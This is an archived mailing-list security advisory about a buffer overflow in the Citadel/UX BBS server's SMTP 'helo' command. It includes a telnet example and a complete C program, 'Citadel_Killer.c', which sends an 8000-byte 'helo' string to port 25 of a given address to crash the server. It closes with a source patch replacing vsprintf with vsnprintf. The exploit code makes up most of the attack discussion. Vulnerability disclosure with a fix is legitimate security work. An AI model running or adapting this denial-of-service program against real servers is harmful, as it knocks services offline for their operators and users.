Citadel/UX Server Remote DoS attack Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 




What is Citadel/UX:

Citadel/UX is an advanced client/server BBS program 
for operating highly interactive sites, both on the 
Internet and over dialup. Users can connect to 
Citadel/UX using any of telnet, WWW, or client 
software. Among the features supported are public 
and private message bases (rooms), electronic mail, 
real-time chat, paging, etc. The server is 
multithreaded and can easily support a large number 
of concurrent users. In addition, SMTP and POP3 
servers are built-in for easy connection to Internet 
mail. Citadel/UX is both robust and mature, having 
been developed over the course of the past twelve 
years.

Problem:
I has found a buffer overflow in the Citadel/UX server. 
an attacker can execute a denial of service attack 
against it. Once the big buffer has been sent, the 
server is vulnerable.

Example:
[xperc@security citadel]$telnet 192.168.0.3 25
Trying 192.168.0.3...
Connected to 192.168.0.3.
Escape character is '^]'.
220 security ESMTP Citadel/UX server ready.
helo [buffer]


[buffer] is around 4096 characters. 


/* Citadel_Killer.c
 *
 * Remote Denial of Service Citadel/UX Server.  
 * 
 *		by xperc@hotmail.com
 */
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define MAXBUF 		8000 
#define MAXBUF2		MAXBUF+6
#define RECVBUF		256
#define CIT_SMTP	25	

int main(int argc, char *argv[])
{
	int sockfd;
	char msg[RECVBUF],buf[MAXBUF],sendbuf
[MAXBUF2];
	struct sockaddr_in target;

	if(argc!=2){
		fprintf(stderr,"Usage: %s 
target_address\n",*argv);
		exit(-1);
	}
	if((sockfd=socket
(AF_INET,SOCK_STREAM,0))<0){
		perror("socket");
		exit(-1);
	}
	target.sin_family=AF_INET;
	target.sin_port=htons(CIT_SMTP);
	target.sin_addr.s_addr=inet_addr(argv[1]);
	if(connect(sockfd,(struct sockaddr*)
&target,sizeof(target))<0){
		perror("connect");
		exit(-1);	
	}
	if(recv(sockfd,msg,sizeof(msg)-1,0)<=0){
		perror("recv");
		exit(-1);
	}

	memset(buf,'a',MAXBUF);
	snprintf(sendbuf,sizeof(sendbuf),"helo %
s",buf);
	strcat(sendbuf,"\n");

	send(sockfd,sendbuf,strlen(sendbuf),0);
	close(sockfd);

	return 0;
}

Patch for this Vulnerability:
--- citadel-old/sysdep.c	Sat Dec  8 12:31:44 
2001
+++ citadel/sysdep.c	Sat Mar  9 05:51:11 
2002
@@ -106,7 +106,7 @@
 	char buf[4096];
   
         va_start(arg_ptr, format);   
-        vsprintf(buf, format, arg_ptr);   
+        vsnprintf(buf, sizeof(buf), format, arg_ptr);   
         va_end(arg_ptr);   
 
 	if (loglevel <= verbosity) {
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux